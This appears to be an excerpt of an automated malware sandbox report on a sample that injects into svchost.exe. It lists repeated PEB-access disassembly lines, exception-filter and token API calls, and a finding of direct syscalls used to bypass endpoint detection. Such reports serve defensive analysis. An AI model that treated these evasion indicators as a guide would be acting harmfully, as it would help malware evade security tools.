Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6E5CF mov eax, dword ptr fs:[00000030h]	2_2_03A6E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6E5CF mov eax, dword ptr fs:[00000030h]	2_2_03A6E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A365D0 mov eax, dword ptr fs:[00000030h]	2_2_03A365D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6A5D0 mov eax, dword ptr fs:[00000030h]	2_2_03A6A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6A5D0 mov eax, dword ptr fs:[00000030h]	2_2_03A6A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40535 mov eax, dword ptr fs:[00000030h]	2_2_03A40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40535 mov eax, dword ptr fs:[00000030h]	2_2_03A40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40535 mov eax, dword ptr fs:[00000030h]	2_2_03A40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40535 mov eax, dword ptr fs:[00000030h]	2_2_03A40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40535 mov eax, dword ptr fs:[00000030h]	2_2_03A40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40535 mov eax, dword ptr fs:[00000030h]	2_2_03A40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5E53E mov eax, dword ptr fs:[00000030h]	2_2_03A5E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5E53E mov eax, dword ptr fs:[00000030h]	2_2_03A5E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5E53E mov eax, dword ptr fs:[00000030h]	2_2_03A5E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5E53E mov eax, dword ptr fs:[00000030h]	2_2_03A5E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5E53E mov eax, dword ptr fs:[00000030h]	2_2_03A5E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AC6500 mov eax, dword ptr fs:[00000030h]	2_2_03AC6500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B04500 mov eax, dword ptr fs:[00000030h]	2_2_03B04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B04500 mov eax, dword ptr fs:[00000030h]	2_2_03B04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B04500 mov eax, dword ptr fs:[00000030h]	2_2_03B04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B04500 mov eax, dword ptr fs:[00000030h]	2_2_03B04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B04500 mov eax, dword ptr fs:[00000030h]	2_2_03B04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B04500 mov eax, dword ptr fs:[00000030h]	2_2_03B04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B04500 mov eax, dword ptr fs:[00000030h]	2_2_03B04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6656A mov eax, dword ptr fs:[00000030h]	2_2_03A6656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6656A mov eax, dword ptr fs:[00000030h]	2_2_03A6656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6656A mov eax, dword ptr fs:[00000030h]	2_2_03A6656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A38550 mov eax, dword ptr fs:[00000030h]	2_2_03A38550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A38550 mov eax, dword ptr fs:[00000030h]	2_2_03A38550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A364AB mov eax, dword ptr fs:[00000030h]	2_2_03A364AB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A644B0 mov ecx, dword ptr fs:[00000030h]	2_2_03A644B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ABA4B0 mov eax, dword ptr fs:[00000030h]	2_2_03ABA4B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AEA49A mov eax, dword ptr fs:[00000030h]	2_2_03AEA49A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A304E5 mov ecx, dword ptr fs:[00000030h]	2_2_03A304E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A2E420 mov eax, dword ptr fs:[00000030h]	2_2_03A2E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A2E420 mov eax, dword ptr fs:[00000030h]	2_2_03A2E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A2E420 mov eax, dword ptr fs:[00000030h]	2_2_03A2E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A2C427 mov eax, dword ptr fs:[00000030h]	2_2_03A2C427
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB6420 mov eax, dword ptr fs:[00000030h]	2_2_03AB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB6420 mov eax, dword ptr fs:[00000030h]	2_2_03AB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB6420 mov eax, dword ptr fs:[00000030h]	2_2_03AB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB6420 mov eax, dword ptr fs:[00000030h]	2_2_03AB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB6420 mov eax, dword ptr fs:[00000030h]	2_2_03AB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB6420 mov eax, dword ptr fs:[00000030h]	2_2_03AB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB6420 mov eax, dword ptr fs:[00000030h]	2_2_03AB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6A430 mov eax, dword ptr fs:[00000030h]	2_2_03A6A430
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A68402 mov eax, dword ptr fs:[00000030h]	2_2_03A68402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A68402 mov eax, dword ptr fs:[00000030h]	2_2_03A68402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A68402 mov eax, dword ptr fs:[00000030h]	2_2_03A68402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ABC460 mov ecx, dword ptr fs:[00000030h]	2_2_03ABC460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5A470 mov eax, dword ptr fs:[00000030h]	2_2_03A5A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5A470 mov eax, dword ptr fs:[00000030h]	2_2_03A5A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5A470 mov eax, dword ptr fs:[00000030h]	2_2_03A5A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6E443 mov eax, dword ptr fs:[00000030h]	2_2_03A6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6E443 mov eax, dword ptr fs:[00000030h]	2_2_03A6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6E443 mov eax, dword ptr fs:[00000030h]	2_2_03A6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6E443 mov eax, dword ptr fs:[00000030h]	2_2_03A6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6E443 mov eax, dword ptr fs:[00000030h]	2_2_03A6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6E443 mov eax, dword ptr fs:[00000030h]	2_2_03A6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6E443 mov eax, dword ptr fs:[00000030h]	2_2_03A6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6E443 mov eax, dword ptr fs:[00000030h]	2_2_03A6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AEA456 mov eax, dword ptr fs:[00000030h]	2_2_03AEA456
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A2645D mov eax, dword ptr fs:[00000030h]	2_2_03A2645D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5245A mov eax, dword ptr fs:[00000030h]	2_2_03A5245A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40BBE mov eax, dword ptr fs:[00000030h]	2_2_03A40BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40BBE mov eax, dword ptr fs:[00000030h]	2_2_03A40BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AE4BB0 mov eax, dword ptr fs:[00000030h]	2_2_03AE4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AE4BB0 mov eax, dword ptr fs:[00000030h]	2_2_03AE4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A38BF0 mov eax, dword ptr fs:[00000030h]	2_2_03A38BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A38BF0 mov eax, dword ptr fs:[00000030h]	2_2_03A38BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A38BF0 mov eax, dword ptr fs:[00000030h]	2_2_03A38BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5EBFC mov eax, dword ptr fs:[00000030h]	2_2_03A5EBFC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ABCBF0 mov eax, dword ptr fs:[00000030h]	2_2_03ABCBF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A50BCB mov eax, dword ptr fs:[00000030h]	2_2_03A50BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A50BCB mov eax, dword ptr fs:[00000030h]	2_2_03A50BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A50BCB mov eax, dword ptr fs:[00000030h]	2_2_03A50BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A30BCD mov eax, dword ptr fs:[00000030h]	2_2_03A30BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A30BCD mov eax, dword ptr fs:[00000030h]	2_2_03A30BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A30BCD mov eax, dword ptr fs:[00000030h]	2_2_03A30BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ADEBD0 mov eax, dword ptr fs:[00000030h]	2_2_03ADEBD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5EB20 mov eax, dword ptr fs:[00000030h]	2_2_03A5EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5EB20 mov eax, dword ptr fs:[00000030h]	2_2_03A5EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AF8B28 mov eax, dword ptr fs:[00000030h]	2_2_03AF8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AF8B28 mov eax, dword ptr fs:[00000030h]	2_2_03AF8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B04B00 mov eax, dword ptr fs:[00000030h]	2_2_03B04B00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AAEB1D mov eax, dword ptr fs:[00000030h]	2_2_03AAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AAEB1D mov eax, dword ptr fs:[00000030h]	2_2_03AAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AAEB1D mov eax, dword ptr fs:[00000030h]	2_2_03AAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AAEB1D mov eax, dword ptr fs:[00000030h]	2_2_03AAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AAEB1D mov eax, dword ptr fs:[00000030h]	2_2_03AAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AAEB1D mov eax, dword ptr fs:[00000030h]	2_2_03AAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AAEB1D mov eax, dword ptr fs:[00000030h]	2_2_03AAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AAEB1D mov eax, dword ptr fs:[00000030h]	2_2_03AAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AAEB1D mov eax, dword ptr fs:[00000030h]	2_2_03AAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A2CB7E mov eax, dword ptr fs:[00000030h]	2_2_03A2CB7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AE4B4B mov eax, dword ptr fs:[00000030h]	2_2_03AE4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AE4B4B mov eax, dword ptr fs:[00000030h]	2_2_03AE4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B02B57 mov eax, dword ptr fs:[00000030h]	2_2_03B02B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B02B57 mov eax, dword ptr fs:[00000030h]	2_2_03B02B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B02B57 mov eax, dword ptr fs:[00000030h]	2_2_03B02B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B02B57 mov eax, dword ptr fs:[00000030h]	2_2_03B02B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AC6B40 mov eax, dword ptr fs:[00000030h]	2_2_03AC6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AC6B40 mov eax, dword ptr fs:[00000030h]	2_2_03AC6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AFAB40 mov eax, dword ptr fs:[00000030h]	2_2_03AFAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AD8B42 mov eax, dword ptr fs:[00000030h]	2_2_03AD8B42
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A28B50 mov eax, dword ptr fs:[00000030h]	2_2_03A28B50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ADEB50 mov eax, dword ptr fs:[00000030h]	2_2_03ADEB50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A38AA0 mov eax, dword ptr fs:[00000030h]	2_2_03A38AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A38AA0 mov eax, dword ptr fs:[00000030h]	2_2_03A38AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A86AA4 mov eax, dword ptr fs:[00000030h]	2_2_03A86AA4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3EA80 mov eax, dword ptr fs:[00000030h]	2_2_03A3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3EA80 mov eax, dword ptr fs:[00000030h]	2_2_03A3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3EA80 mov eax, dword ptr fs:[00000030h]	2_2_03A3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3EA80 mov eax, dword ptr fs:[00000030h]	2_2_03A3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3EA80 mov eax, dword ptr fs:[00000030h]	2_2_03A3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3EA80 mov eax, dword ptr fs:[00000030h]	2_2_03A3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3EA80 mov eax, dword ptr fs:[00000030h]	2_2_03A3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3EA80 mov eax, dword ptr fs:[00000030h]	2_2_03A3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3EA80 mov eax, dword ptr fs:[00000030h]	2_2_03A3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B04A80 mov eax, dword ptr fs:[00000030h]	2_2_03B04A80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A68A90 mov edx, dword ptr fs:[00000030h]	2_2_03A68A90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6AAEE mov eax, dword ptr fs:[00000030h]	2_2_03A6AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6AAEE mov eax, dword ptr fs:[00000030h]	2_2_03A6AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A86ACC mov eax, dword ptr fs:[00000030h]	2_2_03A86ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A86ACC mov eax, dword ptr fs:[00000030h]	2_2_03A86ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A86ACC mov eax, dword ptr fs:[00000030h]	2_2_03A86ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A30AD0 mov eax, dword ptr fs:[00000030h]	2_2_03A30AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A64AD0 mov eax, dword ptr fs:[00000030h]	2_2_03A64AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A64AD0 mov eax, dword ptr fs:[00000030h]	2_2_03A64AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6CA24 mov eax, dword ptr fs:[00000030h]	2_2_03A6CA24
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5EA2E mov eax, dword ptr fs:[00000030h]	2_2_03A5EA2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A54A35 mov eax, dword ptr fs:[00000030h]	2_2_03A54A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A54A35 mov eax, dword ptr fs:[00000030h]	2_2_03A54A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6CA38 mov eax, dword ptr fs:[00000030h]	2_2_03A6CA38
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ABCA11 mov eax, dword ptr fs:[00000030h]	2_2_03ABCA11
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6CA6F mov eax, dword ptr fs:[00000030h]	2_2_03A6CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6CA6F mov eax, dword ptr fs:[00000030h]	2_2_03A6CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6CA6F mov eax, dword ptr fs:[00000030h]	2_2_03A6CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ADEA60 mov eax, dword ptr fs:[00000030h]	2_2_03ADEA60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AACA72 mov eax, dword ptr fs:[00000030h]	2_2_03AACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AACA72 mov eax, dword ptr fs:[00000030h]	2_2_03AACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A36A50 mov eax, dword ptr fs:[00000030h]	2_2_03A36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A36A50 mov eax, dword ptr fs:[00000030h]	2_2_03A36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A36A50 mov eax, dword ptr fs:[00000030h]	2_2_03A36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A36A50 mov eax, dword ptr fs:[00000030h]	2_2_03A36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A36A50 mov eax, dword ptr fs:[00000030h]	2_2_03A36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A36A50 mov eax, dword ptr fs:[00000030h]	2_2_03A36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A36A50 mov eax, dword ptr fs:[00000030h]	2_2_03A36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40A5B mov eax, dword ptr fs:[00000030h]	2_2_03A40A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40A5B mov eax, dword ptr fs:[00000030h]	2_2_03A40A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]	2_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]	2_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]	2_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]	2_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]	2_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]	2_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]	2_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]	2_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]	2_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]	2_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]	2_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]	2_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]	2_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A309AD mov eax, dword ptr fs:[00000030h]	2_2_03A309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A309AD mov eax, dword ptr fs:[00000030h]	2_2_03A309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB89B3 mov esi, dword ptr fs:[00000030h]	2_2_03AB89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB89B3 mov eax, dword ptr fs:[00000030h]	2_2_03AB89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB89B3 mov eax, dword ptr fs:[00000030h]	2_2_03AB89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ABE9E0 mov eax, dword ptr fs:[00000030h]	2_2_03ABE9E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A629F9 mov eax, dword ptr fs:[00000030h]	2_2_03A629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A629F9 mov eax, dword ptr fs:[00000030h]	2_2_03A629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AC69C0 mov eax, dword ptr fs:[00000030h]	2_2_03AC69C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]	2_2_03A3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]	2_2_03A3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]	2_2_03A3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]	2_2_03A3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]	2_2_03A3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]	2_2_03A3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A649D0 mov eax, dword ptr fs:[00000030h]	2_2_03A649D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AFA9D3 mov eax, dword ptr fs:[00000030h]	2_2_03AFA9D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB892A mov eax, dword ptr fs:[00000030h]	2_2_03AB892A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AC892B mov eax, dword ptr fs:[00000030h]	2_2_03AC892B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AAE908 mov eax, dword ptr fs:[00000030h]	2_2_03AAE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AAE908 mov eax, dword ptr fs:[00000030h]	2_2_03AAE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ABC912 mov eax, dword ptr fs:[00000030h]	2_2_03ABC912
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A28918 mov eax, dword ptr fs:[00000030h]	2_2_03A28918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A28918 mov eax, dword ptr fs:[00000030h]	2_2_03A28918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A56962 mov eax, dword ptr fs:[00000030h]	2_2_03A56962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A56962 mov eax, dword ptr fs:[00000030h]	2_2_03A56962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A56962 mov eax, dword ptr fs:[00000030h]	2_2_03A56962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A7096E mov eax, dword ptr fs:[00000030h]	2_2_03A7096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A7096E mov edx, dword ptr fs:[00000030h]	2_2_03A7096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A7096E mov eax, dword ptr fs:[00000030h]	2_2_03A7096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AD4978 mov eax, dword ptr fs:[00000030h]	2_2_03AD4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AD4978 mov eax, dword ptr fs:[00000030h]	2_2_03AD4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ABC97C mov eax, dword ptr fs:[00000030h]	2_2_03ABC97C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB0946 mov eax, dword ptr fs:[00000030h]	2_2_03AB0946
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B04940 mov eax, dword ptr fs:[00000030h]	2_2_03B04940
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A30887 mov eax, dword ptr fs:[00000030h]	2_2_03A30887
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ABC89D mov eax, dword ptr fs:[00000030h]	2_2_03ABC89D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AFA8E4 mov eax, dword ptr fs:[00000030h]	2_2_03AFA8E4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6C8F9 mov eax, dword ptr fs:[00000030h]	2_2_03A6C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6C8F9 mov eax, dword ptr fs:[00000030h]	2_2_03A6C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5E8C0 mov eax, dword ptr fs:[00000030h]	2_2_03A5E8C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B008C0 mov eax, dword ptr fs:[00000030h]	2_2_03B008C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A52835 mov eax, dword ptr fs:[00000030h]	2_2_03A52835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A52835 mov eax, dword ptr fs:[00000030h]	2_2_03A52835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A52835 mov eax, dword ptr fs:[00000030h]	2_2_03A52835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A52835 mov ecx, dword ptr fs:[00000030h]	2_2_03A52835

Source: C:\Users\user\Desktop\bkTW1FbgHN.exe

Code function: 0_2_00FE80A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,

0_2_00FE80A9

Source: C:\Users\user\Desktop\bkTW1FbgHN.exe	Code function: 0_2_00FBA155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_00FBA155
Source: C:\Users\user\Desktop\bkTW1FbgHN.exe	Code function: 0_2_00FBA124 SetUnhandledExceptionFilter,		0_2_00FBA124

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

